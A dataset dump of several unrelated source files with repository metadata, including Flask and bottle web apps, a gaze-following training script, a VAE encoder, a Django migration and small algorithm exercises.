def extrude(self,md): # {{{
self.mantle_viscosity=project3d(md,'vector',self.mantle_viscosity,'type','node')
self.lithosphere_thickness=project3d(md,'vector',self.lithosphere_thickness,'type','node')
return self
#}}}
def setdefaultparameters(self): # {{{
self.cross_section_shape=1;
return self
#}}}
def checkconsistency(self,md,solution,analyses): # {{{
# Early return
if ('GiaAnalysis' not in analyses):
return md
md = checkfield(md,'fieldname','gia.mantle_viscosity','NaN',1,'Inf',1,'size',[md.mesh.numberofvertices],'>',0)
md = checkfield(md,'fieldname','gia.lithosphere_thickness','NaN',1,'Inf',1,'size',[md.mesh.numberofvertices],'>',0)
md = checkfield(md,'fieldname','gia.cross_section_shape','numel',[1],'values',[1,2])
#be sure that if we are running a masstransport ice flow model coupled with giaivins, that thickness forcings
#are not provided into the future.
return md
# }}}
def marshall(self,prefix,md,fid): # {{{
WriteData(fid,prefix,'object',self,'fieldname','mantle_viscosity','format','DoubleMat','mattype',1);
WriteData(fid,prefix,'object',self,'fieldname','lithosphere_thickness','format','DoubleMat','mattype',1,'scale',10.**3.);
WriteData(fid,prefix,'object',self,'fieldname','cross_section_shape','format','Integer');
# }}}
|
[
"cummings.evan@gmail.com"
] |
cummings.evan@gmail.com
|
fa4c4bebb84eeea7871eaf044e4ec0be599f769c
|
3d9506b859cdbf38a21549cd3d64b69ecde7674e
|
/GoogleCodeJam/2020KickstartRoundB/BusRoute.py
|
b7cceed2c849cd5b217cc8829a02467223137486
|
[] |
no_license
|
bradykim7/Algorithm
|
1ae4c6e4e6d72687b660ddf0768a9174cc8d7b8c
|
053210a1205f4e62b367f85b65dcb60fcad74008
|
refs/heads/master
| 2022-06-25T04:46:55.265058
| 2022-06-17T08:08:52
| 2022-06-17T08:08:52
| 233,500,101
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 349
|
py
|
import sys;
if __name__=='__main__':
t = int(input());
for i in range(t):
nd = input().split();
n=int(nd[0]); d=int(nd[1]);
ans =d;
x= list(map(int,input().rstrip().split()));
for j in x:
ans -= d % j
print('Case #%d: %d'%(i+1,ans))
|
[
"bradykim777@gmail.com"
] |
bradykim777@gmail.com
|
c403719d00c3664c1b2cb6adf47318a985282c01
|
f54a87aa1196cbe9ac56dfab44295201444edeaf
|
/130818_FlaskTweets/ex.py
|
784dc936880419c67a4f50eee2b2e00e78ddae36
|
[] |
no_license
|
pythonflaskstudy2013/Weekly--Python-
|
66d291a1b48d3d7618235e1e141e1f1e40908ce2
|
5bf1416f10df3daa119d15f87c5cbb346ab6e81c
|
refs/heads/master
| 2020-03-27T01:11:07.148567
| 2013-09-01T04:13:46
| 2013-09-01T04:13:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,130
|
py
|
#!/usr/bin/env python
from flask import Flask
from flask import render_template, render_template_string, request
import math
app = Flask(__name__)
books = ['Programming in Scala', 'Mining the Social Web', 'Pattern-Oriented Software Architecture']
@app.route('/inherit')
def inherit():
return render_template('child.html')
@app.route('/books')
def list():
return render_template('books.html', books=books)
@app.route('/animals')
def animals():
return render_template('animals.html', animals=[
'cat', 'dog', 'pig', 'cow', 'sheep', 'panda', 'bear'
])
@app.route('/macro')
def forms():
return render_template('macro.html')
@app.route('/filter')
def filter():
return render_template('filter.html')
@app.route('/custom')
def custom():
return render_template('custom.html')
@app.template_filter()
def reverse(text):
return text[::-1]
@app.template_test()
def is_prime(n):
if n == 2:
return True
for i in range(2, int(math.ceil(math.sqrt(n))) + 1):
if n % i == 0:
return False
return True
@app.template_global()
def whoami():
return 'My Name is Daegeun'
app.run(debug=True)
|
[
"dgkim84@gmail.com"
] |
dgkim84@gmail.com
|
128d2a94962ecb1a54b4c9c3ca840004e656b188
|
9e241ae22cafe7ed4aaba2f06632420a63ec44fd
|
/Project 142/main.py
|
c30ed130f6ed02a9f977b69ffb0d69621d3dc3a8
|
[] |
no_license
|
Whitehat-Lataksh/Article-Recommending
|
b970f4d916733667aca20f85321710c1b40def62
|
ece145cc7b86288750339b38c319fd15e5490450
|
refs/heads/main
| 2023-08-11T20:23:14.510692
| 2021-09-17T04:55:17
| 2021-09-17T04:55:17
| 407,406,604
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,367
|
py
|
from flask import Flask, jsonify, request
from storage import all_articles, liked_articles, not_liked_articles
from demographic_filtering import output
from content_filtering import get_recommendations
app = Flask(__name__)
@app.route("/get-article")
def get_article():
movie_data = {
"url": all_articles[0][11],
"title": all_articles[0][12],
"text": all_articles[0][13],
"lang": all_articles[0][14],
"total_events": all_articles[0][15]
}
return jsonify({
"data": movie_data,
"status": "success"
})
@app.route("/liked-article", methods=["POST"])
def liked_article():
article = all_articles[0]
liked_articles.append(article)
all_articles.pop(0)
return jsonify({
"status": "success"
}), 201
@app.route("/unliked-article", methods=["POST"])
def unliked_article():
article = all_articles[0]
not_liked_articles.append(article)
all_articles.pop(0)
return jsonify({
"status": "success"
}), 201
@app.route("/popular-articles")
def popular_articles():
article_data = []
for article in output:
_d = {
"url": article[0],
"title": article[1],
"text": article[2],
"lang": article[3],
"total_events": article[4]
}
article_data.append(_d)
return jsonify({
"data": article_data,
"status": "success"
}), 200
@app.route("/recommended-articles")
def recommended_articles():
all_recommended = []
for liked_article in liked_articles:
output = get_recommendations(liked_article[4])
for data in output:
all_recommended.append(data)
import itertools
all_recommended.sort()
all_recommended = list(all_recommended for all_recommended,_ in itertools.groupby(all_recommended))
article_data = []
for recommended in all_recommended:
_d = {
"url": recommended[0],
"title": recommended[1],
"text": recommended[2],
"lang": recommended[3],
"total_events": recommended[4]
}
article_data.append(_d)
return jsonify({
"data": article_data,
"status": "success"
}), 200
if __name__ == "__main__":
app.run()
|
[
"noreply@github.com"
] |
Whitehat-Lataksh.noreply@github.com
|
5d842f89dca376141a6a97ff7ced4635dd7d4015
|
82aa64e423bcd2d2ae77a58552417bee0e2e3c9a
|
/Python/Basic Data Types/Lists.py
|
a42ace84b7ade4cfccefe4845b940184473c576a
|
[] |
no_license
|
abhi1362/HackerRank
|
7cdbb8a2fadd42e749fc5a7ce8635c2c303a9057
|
95dcd35ba554023c3d74c6e6574a1fbedc5e7845
|
refs/heads/master
| 2021-12-29T19:54:52.750399
| 2018-01-28T07:06:00
| 2018-01-28T07:06:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,014
|
py
|
if __name__ == '__main__':
N = int(input())
array_list = []
def print_():
print(array_list)
def sort():
array_list.sort()
def pop():
array_list.pop()
def insert():
array_list.insert(index,value)
def append():
array_list.append(value)
def reverse():
array_list.reverse()
def remove():
array_list.remove(value)
for i in range(0,N):
user_command = input()
command = user_command.split()
com = command[0]
if len(command) >= 2:
value = int(command[1])
index = value
if len(command)>=3:
value = int(command[2])
index = int(command[1])
commands ={
"insert":insert,
"remove":remove,
"pop":pop,
"reverse":reverse,
"append":append,
"insert":insert,
"sort":sort,
"print":print_,
}
commands[com]()
|
[
"prvnbeloved@gmail.com"
] |
prvnbeloved@gmail.com
|
3db3cc00113a6fb614fa79bc5f0a9a2b4972075f
|
de17da755ea35e928afbaf48d41c23053e43af8a
|
/CourseSite/courses/migrations/0023_auto_20180426_1616.py
|
fa77713cabba30af89bec7958051af1a7c5157c2
|
[] |
no_license
|
m-gautam/Course_SIte-Project-
|
353aaec6695ca769cd16f38a0118ae4abc52bf9e
|
2b2cd1f3f4f85fec5c4b18355c111c67ce6dfcd0
|
refs/heads/master
| 2021-04-26T22:47:21.042398
| 2020-05-17T21:15:47
| 2020-05-17T21:15:47
| 124,147,812
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 580
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.10 on 2018-04-26 16:16
from __future__ import unicode_literals
import django.contrib.postgres.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('courses', '0022_auto_20180426_1615'),
]
operations = [
migrations.AlterField(
model_name='course',
name='prereq_courses',
field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=200), default='NULL', size=None),
),
]
|
[
"gautimeena456@gmail.com"
] |
gautimeena456@gmail.com
|
ba82f9b61b3eb06587fc5c2185adf9b9c041c8cf
|
bf33b8048d99eec4f693945d84f401ebe6083db2
|
/mybottle/sign/signup.py
|
d3f9f6c81e196105173160280a3cdb324ed8d510
|
[] |
no_license
|
yzhang3beatit/filesForServer
|
89f507937447511c12c6f9f35aa146b7619cbf42
|
eb7a551bc815c9f981ede01d058d9e0b6136971f
|
refs/heads/master
| 2021-01-19T05:10:50.982745
| 2016-07-21T06:28:50
| 2016-07-21T06:28:50
| 61,519,501
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,950
|
py
|
from bottle import route, run, request
import xml.etree.ElementTree as ET
from time import strftime, localtime, time, clock
from bisect import bisect_left
from xls.xls_record import get_records_from_xls, write_to_excel
mem_dir = '/home/y184zhan/tmp/'
readable = mem_dir+'xml_file.txt'
origin = mem_dir+'msg_file.txt'
KEYWORD = '1python'
def sec2str(secs):
return strftime("%Y-%m-%d %H:%M:%S", localtime(secs))
def parseXML(recvmsg):
# printToFile(recvmsg, origin, 'ba')
_str = byte2str(recvmsg)
# printToFile(_str, readable, 'a+')
root = ET.fromstring(_str)
msg = {}
for child in root:
if child.tag == 'CreateTime':
msg[child.tag] = sec2str(int(child.text))
else:
msg[child.tag] = child.text
return msg
textTpl = '''<xml>
<ToUserName><![CDATA[%s]]></ToUserName>
<FromUserName><![CDATA[%s]]></FromUserName>
<CreateTime>%s</CreateTime>
<MsgType><![CDATA[text]]></MsgType>
<Content><![CDATA[%s]]></Content>
</xml>'''
def printToFile(msg, filepath, flag):
f = open(filepath, flag)
f.write(msg)
f.close()
def byte2str(utfByte):
_str = utfByte.decode()
# print(_str)
return _str
@route('/', method='POST')
def index():
start = clock()
openid = request.query.openid
# print("OPENID in FORMS:", openid)
# for l in request.body:
# print(l)
msg = parseXML(request.body.read())
echostr = build_echostr(msg)
end = clock()
print('Running time: %fs' %(end - start))
return echostr
DATA = []
DATA_INDEX = []
def main():
global DATA
global DATA_INDEX
DATA = read_data_file()
DATA_INDEX = [x[0] for x in DATA]
def read_data_file():
filename = './sign_record.xls'
datalist = get_records_from_xls(filename, 'Clear')
return datalist
def build_echostr(msg):
content = msg['Content'].strip()
welcome = u"Welcome to Coach Workroom"
if content == "print" and msg['FromUserName'] == "oPZW5t7_QdCpwjFK092Bn-iywx6s":
welcome = u"Yes, Sir !\n"
data_list = [x[4] for x in DATA]
len_ = len(data_list) - 2
names = ',\n'.join(data_list)
welcome += str(len_) + '\n'
welcome += names
elif content == "save" and msg['FromUserName'] == "oPZW5t7_QdCpwjFK092Bn-iywx6s":
welcome = u"Yes, Sir !"
write_to_excel('result.xls', 'SIGN', len(DATA), 7, None, DATA)
elif content.lower() == 'update':
welcome = u"Please type in your ID\n(e.g. 10240148)"
update_data_clear(msg['FromUserName'])
elif KEYWORD in content:
user = update_data_sign(msg['FromUserName'], content, msg['CreateTime'])
if user: # user[4] == name:
if user[1]: # meno
welcome = u"%s, you have signed!" %user[4]
else:
welcome = u"Welcome to sign-in: %s" %user[4]
else:
welcome = u"Please type in Nokia ID:\n(e.g. 10240148)"
elif content.isdigit() and len(content) == 8:
welcome = u"Please type in your name\n(e.g. ZhangYang):"
update_data_nokiaid(msg['FromUserName'], content)
elif is_name(content):
welcome = u"Please type in keyword to sign-in"
update_data_name(msg['FromUserName'], content)
else:
user = update_data_find(msg['FromUserName'])
if user: # user[4] == name
if not user[4]:
welcome = u"Please type in your name\n(e.g. ZhangYang):"
elif user[1]: # user[1] == memo
welcome = u"%s, you have signed!" % user[4]
else:
welcome = u"%s, please type in keyword to sign" % user[4]
else:
welcome = u"Please sign up with your:\nNokiaID (e.g. 12345678)"
echostr = textTpl % (msg['FromUserName'], msg['ToUserName'], str(int(time())),
welcome)
# #print(DATA)
return echostr
def is_name(str_):
return str_.isalpha() and str_[0].isupper()
def update_data_clear(openid):
index = bisect_left(DATA_INDEX, openid)
if index < len(DATA_INDEX) and DATA_INDEX[index] == openid:
DATA[index][4] = ''
DATA[index][5] = ''
def update_data_find(openid):
index = bisect_left(DATA_INDEX, openid)
if index < len(DATA_INDEX) and DATA_INDEX[index] == openid:
return DATA[index]
def update_data_sign(openid, meno, timestamp):
global DATA
global DATA_INDEX
index = bisect_left(DATA_INDEX, openid)
if index < len(DATA_INDEX) and DATA_INDEX[index] == openid:
# print('found openid for ', meno)
DATA[index][1] = meno
DATA[index][2] = timestamp
return DATA[index]
else:
new = [openid, meno, '', '', '', '', '']
DATA.insert(index, new)
DATA_INDEX.insert(index, openid)
return
def update_data_name(openid, name):
global DATA
global DATA_INDEX
index = bisect_left(DATA_INDEX, openid)
if index < len(DATA_INDEX) and DATA_INDEX[index] == openid:
# print('found openid for ', name)
if not DATA[index][4].strip():
DATA[index][4] = name
else:
new = [openid, '', '', '', name, '', ' ']
DATA.insert(index, new)
DATA_INDEX.insert(index, openid)
def update_data_nokiaid(openid, nokiaid):
global DATA
global DATA_INDEX
index = bisect_left(DATA_INDEX, openid)
if index < len(DATA_INDEX) and DATA_INDEX[index] == openid:
# print('found openid for ', nokiaid)
if not DATA[index][5].strip():
DATA[index][5] = nokiaid
else:
new = [openid, '', '', '', '', nokiaid,' ']
DATA.insert(index, new)
DATA_INDEX.insert(index, openid)
'''
user = {'ID':msg['FromUserName'], 'Memo': msg['Content'], 'Name':msg['name'],
'Nokia ID':msg['nokiaid'], 'Department':msg['mdep'],
'TimeStamp':msg['CreateTime'], 'Sign':msg['Content']}
'''
if __name__ == "__main__":
main()
run(host='0.0.0.0', port=80)
|
[
"yang.2.zhang@nokia.com"
] |
yang.2.zhang@nokia.com
|
7baa26a26fc7ed616e1f4cfa37d283d39e72ebf3
|
bbdd7f44884844cd0f7332d63945852dc2b53083
|
/mypy_drf_plugin/transformers/fields.py
|
f4f8a10b2f9cc833f0b0e6cedc3fe13340f2fdf9
|
[
"MIT"
] |
permissive
|
private-forks/djangorestframework-stubs
|
e258e1dfc2af80fdf93322338ea3ce5452087e2d
|
18427718c913f3d23ef7a4636c8205df42999cf2
|
refs/heads/master
| 2020-04-25T09:11:04.067894
| 2019-02-24T22:25:03
| 2019-02-24T22:25:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,241
|
py
|
from mypy.nodes import TypeInfo, Var
from mypy.plugin import FunctionContext
from mypy.types import AnyType, Instance, Type, TypeOfAny
from mypy_django_plugin import helpers
def get_private_descriptor_type(type_info: TypeInfo, private_field_name: str, is_nullable: bool) -> Type:
if not type_info.has_readable_member(private_field_name):
return AnyType(TypeOfAny.unannotated)
node = type_info.get(private_field_name).node
if isinstance(node, Var):
descriptor_type = node.type
if is_nullable:
descriptor_type = helpers.make_optional(descriptor_type)
return descriptor_type
return AnyType(TypeOfAny.unannotated)
def fill_parameters_of_descriptor_methods_from_private_attributes(ctx: FunctionContext) -> Type:
default_return_type = ctx.default_return_type
if not isinstance(default_return_type, Instance):
return default_return_type
is_nullable = bool(helpers.parse_bool(helpers.get_argument_by_name(ctx, 'allow_null')))
get_type = get_private_descriptor_type(default_return_type.type, '_pyi_private_get_type',
is_nullable=is_nullable)
return helpers.reparametrize_instance(default_return_type, [get_type])
|
[
"maxim.kurnikov@gmail.com"
] |
maxim.kurnikov@gmail.com
|
3e8e2a961f16337985eed5135e0657e6cf615172
|
ccc688aeae19f19e2167c3e730025a1b43b7f717
|
/gazefollowing/training/train_gazenet.py
|
618fed1be3889333ff7c1655a6b9968c0a97ea7b
|
[] |
no_license
|
PrimeshShamilka/GOO
|
32cddb1c3b4ad83ec901f1e61e0defe00205991f
|
6a374cceed59cb6925099382f3f56aef52820d07
|
refs/heads/main
| 2023-09-01T05:47:59.185702
| 2021-10-13T19:07:01
| 2021-10-13T19:07:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,198
|
py
|
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
import numpy as np
import cv2
from sklearn.metrics import roc_auc_score
from tqdm import tqdm
def F_loss(direction, predict_heatmap, eye_position, gt_position, gt_heatmap):
# point loss
heatmap_loss = nn.BCELoss()(predict_heatmap, gt_heatmap)
# angle loss
gt_direction = gt_position - eye_position
middle_angle_loss = torch.mean(1 - nn.CosineSimilarity()(direction, gt_direction))
return heatmap_loss, middle_angle_loss
class GazeOptimizer():
def __init__(self, net, initial_lr):
self.optimizer_s1 = optim.Adam([{'params': net.module.face_net.parameters(),
'initial_lr': initial_lr},
{'params': net.module.face_process.parameters(),
'initial_lr': initial_lr},
{'params': net.module.eye_position_transform.parameters(),
'initial_lr': initial_lr},
{'params': net.module.fusion.parameters(),
'initial_lr': initial_lr}],
lr=initial_lr, weight_decay=0.0001)
self.optimizer_s2 = optim.Adam([{'params': net.module.fpn_net.parameters(),
'initial_lr': initial_lr}],
lr=initial_lr, weight_decay=0.0001)
self.optimizer_s3 = optim.Adam([{'params': net.parameters(), 'initial_lr': initial_lr}],
lr=initial_lr*0.1, weight_decay=0.0001)
self.lr_scheduler_s1 = optim.lr_scheduler.StepLR(self.optimizer_s1, step_size=5, gamma=0.1, last_epoch=-1)
self.lr_scheduler_s2 = optim.lr_scheduler.StepLR(self.optimizer_s2, step_size=5, gamma=0.1, last_epoch=-1)
self.lr_scheduler_s3 = optim.lr_scheduler.StepLR(self.optimizer_s3, step_size=5, gamma=0.1, last_epoch=-1)
self.optimizer = self.optimizer_s1
def getOptimizer(self, epoch):
if epoch < 7:
lr_scheduler = self.lr_scheduler_s1
self.optimizer = self.optimizer_s1
elif epoch < 15:
lr_scheduler = self.lr_scheduler_s2
self.optimizer = self.optimizer_s2
else:
lr_scheduler = self.lr_scheduler_s3
self.optimizer = self.optimizer_s3
lr_scheduler.step()
return self.optimizer
def train(net, train_dataloader, optimizer, epoch, logger):
running_loss = []
for i, data in tqdm(enumerate(train_dataloader), total=len(train_dataloader)):
image, face_image, gaze_field, eye_position, gt_position, gt_heatmap = \
data['image'], data['face_image'], data['gaze_field'], data['eye_position'], data['gt_position'], data['gt_heatmap']
image, face_image, gaze_field, eye_position, gt_position, gt_heatmap = \
map(lambda x: Variable(x.cuda()), [image, face_image, gaze_field, eye_position, gt_position, gt_heatmap])
optimizer.zero_grad()
direction, predict_heatmap = net([image, face_image, gaze_field, eye_position])
heatmap_loss, m_angle_loss = \
F_loss(direction, predict_heatmap, eye_position, gt_position, gt_heatmap)
if epoch == 0:
loss = m_angle_loss
elif epoch >= 7 and epoch <= 14:
loss = heatmap_loss
else:
loss = m_angle_loss + heatmap_loss
loss.backward()
optimizer.step()
running_loss.append([heatmap_loss.item(),
m_angle_loss.item(), loss.item()])
if i % 100 == 99:
logger.info('%s'%(str(np.mean(running_loss, axis=0))))
running_loss = []
return running_loss
def test(net, test_data_loader, logger, save_output=False):
net.eval()
total_loss = []
total_error = []
info_list = []
heatmaps = []
all_gazepoints = []
all_predmap = []
all_gtmap = []
with torch.no_grad():
for data in tqdm(test_data_loader, total=len(test_data_loader)):
image, face_image, gaze_field, eye_position, gt_position, gt_heatmap = \
data['image'], data['face_image'], data['gaze_field'], data['eye_position'], data['gt_position'], data['gt_heatmap']
image, face_image, gaze_field, eye_position, gt_position, gt_heatmap = \
map(lambda x: Variable(x.cuda()), [image, face_image, gaze_field, eye_position, gt_position, gt_heatmap])
direction, predict_heatmap = net([image, face_image, gaze_field, eye_position])
#curr_batch_size = predict_heatmap.shape[0]
#predict_heatmap = torch.rand(curr_batch_size, 1, 56, 56).cuda()
heatmap_loss, m_angle_loss = \
F_loss(direction, predict_heatmap, eye_position, gt_position, gt_heatmap)
loss = heatmap_loss + m_angle_loss
total_loss.append([heatmap_loss.item(),
m_angle_loss.item(), loss.item()])
#logger.info('loss: %.5lf, %.5lf, %.5lf'%( \
# heatmap_loss.item(), m_angle_loss.item(), loss.item()))
middle_output = direction.cpu().data.numpy()
final_output = predict_heatmap.cpu().data.numpy()
target = gt_position.cpu().data.numpy()
eye_position = eye_position.cpu().data.numpy()
predict_heatmap = predict_heatmap.cpu().data.numpy()
for m_direction, f_point, gt_point, eye_point, heatmap in \
zip(middle_output, final_output, target, eye_position, predict_heatmap):
f_point = f_point.reshape([224 // 4, 224 // 4])
heatmaps.append(f_point)
h_index, w_index = np.unravel_index(f_point.argmax(), f_point.shape)
f_point = np.array([w_index / 56., h_index / 56.])
f_error = f_point - gt_point
f_dist = np.sqrt(f_error[0] ** 2 + f_error[1] ** 2)
# angle
f_direction = f_point - eye_point
gt_direction = gt_point - eye_point
norm_m = (m_direction[0] **2 + m_direction[1] ** 2 ) ** 0.5
norm_f = (f_direction[0] **2 + f_direction[1] ** 2 ) ** 0.5
norm_gt = (gt_direction[0] **2 + gt_direction[1] ** 2 ) ** 0.5
m_cos_sim = (m_direction[0]*gt_direction[0] + m_direction[1]*gt_direction[1]) / \
(norm_gt * norm_m + 1e-6)
m_cos_sim = np.maximum(np.minimum(m_cos_sim, 1.0), -1.0)
m_angle = np.arccos(m_cos_sim) * 180 / np.pi
f_cos_sim = (f_direction[0]*gt_direction[0] + f_direction[1]*gt_direction[1]) / \
(norm_gt * norm_f + 1e-6)
f_cos_sim = np.maximum(np.minimum(f_cos_sim, 1.0), -1.0)
f_angle = np.arccos(f_cos_sim) * 180 / np.pi
#AUC
heatmap = np.squeeze(heatmap)
heatmap = cv2.resize(heatmap, (5, 5))
gt_heatmap = np.zeros((5, 5))
x, y = list(map(int, gt_point * 5))
gt_heatmap[y, x] = 1.0
all_gazepoints.append(f_point)
all_predmap.append(heatmap)
all_gtmap.append(gt_heatmap)
#score = roc_auc_score(gt_heatmap.reshape([-1]).astype(np.int32), heatmap.reshape([-1]))
total_error.append([f_dist, f_angle])
info_list.append(list(f_point))
info_list = np.array(info_list)
l2, ang = np.mean(np.array(total_error), axis=0)
all_gazepoints = np.vstack(all_gazepoints)
all_predmap = np.stack(all_predmap).reshape([-1])
all_gtmap = np.stack(all_gtmap).reshape([-1])
auc = roc_auc_score(all_gtmap, all_predmap)
if save_output:
np.savez('predictions.npz', gazepoints=all_gazepoints)
#logger.info('average loss : %s'%str(np.mean(np.array(total_loss), axis=0)))
logger.info('average error: %s'%str([auc, l2, ang]))
net.train()
return [auc, l2, ang]
|
[
"henri.tomas@eee.upd.edu.ph"
] |
henri.tomas@eee.upd.edu.ph
|
3bd778d2775c1fc9582037bb95bba1c5063b9273
|
5414512230d3fb1b6ba70d9f1eabb2bfaae6f337
|
/List_Array.py
|
702a09f18efc8a9dfd700bebedcdb4e42f672300
|
[] |
no_license
|
offenanil/dunder_method
|
950968d7eae9cf3d5714130f34997824a1e9b473
|
6956774f0aa06b7722431fce0dfebef595c01c97
|
refs/heads/main
| 2023-07-03T12:25:19.200499
| 2021-08-06T02:12:20
| 2021-08-06T02:12:20
| 392,276,739
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 399
|
py
|
# name = "Anil"
# age = 28
# phone = 984123
# address = 'Sydney'
# print(name,'', age,'',phone,'',address)
users = ['ram', 'sita', 'gita', 'hari']
# index start from o to infinity from left to right or first index refer as -infinity as well i.e last index will be -1
print(users)
# if i want to print gita only the syntax be like
print(users[2])
print(users[-2])
# output will be same in above case
|
[
"offenanil@gmail.com"
] |
offenanil@gmail.com
|
ab2e70e575b38380a237025bcdbb447ce34fba5a
|
88eb514f6934c8b3e0a86f852f4202325a0546b7
|
/recepis/migrations/0002_rename_receitas_receita.py
|
a688a952255112952123cf68f9ae2fd4c30b680e
|
[] |
no_license
|
AllysonAbreu/projeto-pw
|
2859a90c4fbb75e26397e068327b1e7ad791f2a1
|
5e85935ccc6329d1234081541201cc6f0287741f
|
refs/heads/main
| 2023-09-01T05:02:31.127160
| 2021-09-16T23:08:58
| 2021-09-16T23:08:58
| 402,399,271
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 322
|
py
|
# Generated by Django 3.2.7 on 2021-09-02 17:38
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('recepis', '0001_initial'),
]
operations = [
migrations.RenameModel(
old_name='Receitas',
new_name='Receita',
),
]
|
[
"Aoa3698741@_"
] |
Aoa3698741@_
|
5b98146395ad29c6511925bbc47a3402f1251fa2
|
1e168ced1a4bdb53967021e082b98027aea9d38a
|
/1.알고리즘정리/정렬/삽입정렬.py
|
6e0f94afc79ed7d33b51a468d14c6182e85e3d68
|
[] |
no_license
|
vvspearlvvs/CodingTest
|
3ebf921308570ac11eb87e6660048ccfcaf90ce4
|
fc61b71d955f73ef8710f792d008bc671614ef7a
|
refs/heads/main
| 2023-07-13T15:57:11.312519
| 2021-08-25T02:15:28
| 2021-08-25T02:15:28
| 354,232,513
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 282
|
py
|
#삽입정렬
arr = [7, 5, 9, 0, 3, 1, 6, 2, 4, 8]
for i in range(len(arr)):
for j in range(i,0,-1):
if arr[j]<arr[j-1]: #한칸씩 왼쪽으로 이동
arr[j],arr[j-1]=arr[j-1],arr[j]
else:
break
print(arr)
print("최종")
print(arr)
|
[
"gg66477@gmail.com"
] |
gg66477@gmail.com
|
8b0bcb3eb0687fab864e824994d9b70939870f5d
|
5bcee9248d0bdebb134c61b4d0a3f3113337a569
|
/lesson_0902/01_lists.py
|
816ff09874e0073dca2b2f3d1f0fd9d842bcbb7b
|
[] |
no_license
|
100ballovby/6V_Lesson
|
c2edbc652ea2ebec07eeed60060c16ae4b4792e4
|
4b6dfda323a628558bd63bd5569960004fc335dd
|
refs/heads/master
| 2023-05-08T07:49:14.569854
| 2021-05-25T06:40:53
| 2021-05-25T06:40:53
| 330,888,686
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,044
|
py
|
'''
Список - упорядоченная структура данных, заключенная в квадратные
скобочки. Элементы разделены между собой запятой.
Чтобы создать список, необходимо придумать ему имя, поставить знак принадлежности (=)
и открыть квадратные скобки.
список = [1, 26, 15, 5.6, 'привет, Андрей']
'''
cars = ['audi', 'mercedes', 'toyota', 'skoda', 'seat']
# хочу вывести весь список
print(cars)
# хочу вывести из списка тойоту
print(cars[2])
print(cars[-1]) # вывести последний элемент списка
import random # модуль рандом создает случайности
print('My first car was', cars[random.randint(0, 4)])
# randint(a, b) - выдать случайное число (random int)
# в диапазоне от a до b
print(random.randint(-100, 100))
|
[
"greatraksin@icloud.com"
] |
greatraksin@icloud.com
|
2abb9c8ae38feb38f85cf81f93563ee9f1f3914a
|
5cc9623db04e92a9ddee09c27a168d04c39b6e19
|
/model/encoder.py
|
beb00c3109d7b79d9fd4e96c2b9b261a3958fa8f
|
[
"MIT"
] |
permissive
|
FengHZ/VAEGAN
|
2e4d8c65d39e0b79a983b1be45c29987ecfc3f3e
|
0c113dc973b19fe212aca07a4a898fa919346d41
|
refs/heads/master
| 2020-05-22T04:52:42.156153
| 2019-05-12T07:30:09
| 2019-05-12T07:30:09
| 186,224,301
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,451
|
py
|
from torch import nn
import torch
class Encoder(nn.Module):
def __init__(self, num_channel=3, num_feature=64, latent_dim=100, data_parallel=True):
super(Encoder, self).__init__()
features = nn.Sequential(
# input is (num_channel) x 64 x 64
nn.Conv2d(num_channel, num_feature, 4, 2, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. (num_feature) x 32 x 32
nn.Conv2d(num_feature, num_feature * 2, 4, 2, 1, bias=False),
nn.BatchNorm2d(num_feature * 2),
nn.LeakyReLU(0.2, inplace=True),
# state size. (num_feature*2) x 16 x 16
nn.Conv2d(num_feature * 2, num_feature * 4, 4, 2, 1, bias=False),
nn.BatchNorm2d(num_feature * 4),
nn.LeakyReLU(0.2, inplace=True),
# state size. (num_feature*4) x 8 x 8
nn.Conv2d(num_feature * 4, num_feature * 8, 4, 2, 1, bias=False),
nn.BatchNorm2d(num_feature * 8),
nn.LeakyReLU(0.2, inplace=True),
)
z_mean_map = nn.Sequential(
# state size. (num_feature*8) x 4 x 4
nn.Conv2d(num_feature * 8, latent_dim, 4, 1, 0, bias=True),
)
z_log_sigma_map = nn.Sequential(
# state size. (num_feature*8) x 4 x 4
nn.Conv2d(num_feature * 8, latent_dim, 4, 1, 0, bias=True),
)
if data_parallel:
self.features = nn.DataParallel(features)
self.z_mean_map = nn.DataParallel(z_mean_map)
self.z_log_sigma_map = nn.DataParallel(z_log_sigma_map)
else:
self.features = features
self.z_mean_map = z_mean_map
self.z_log_sigma_map = z_log_sigma_map
for name, param in self.named_parameters():
if 'conv' in name and 'weight' in name:
nn.init.xavier_normal_(param.data)
elif 'norm' in name and 'weight' in name:
param.data.fill_(1)
elif 'norm' in name and 'bias' in name:
param.data.fill_(0)
def forward(self, input):
features = self.features(input)
mu = self.z_mean_map(features)
log_sigma = self.z_mean_map(features)
sigma = torch.exp(log_sigma)
std_z = torch.randn(mu.size())
if mu.is_cuda:
std_z = std_z.cuda()
z_sample = mu+std_z*sigma
return features, mu, log_sigma, sigma,z_sample
|
[
"fenghz@zju.edu.cn"
] |
fenghz@zju.edu.cn
|
8577baebc54712a01aff72b610290ff2ca7776d9
|
cd8d6d20351b86b6e2b28500467d8999f9fa4439
|
/src/image_scraping_step_3/alert_program.py
|
83a08327cd98f3738516d57a4b84849217aa1d3c
|
[
"MIT"
] |
permissive
|
mhmulder/image_captioning
|
bf706f574ba12e3daa5b9b8bfdf0d733233abb7d
|
ed22a3b4948d1ce5e8db580433d58945a2a5f010
|
refs/heads/master
| 2021-09-05T19:46:12.694992
| 2018-01-30T16:46:29
| 2018-01-30T16:46:29
| 115,772,652
| 1
| 1
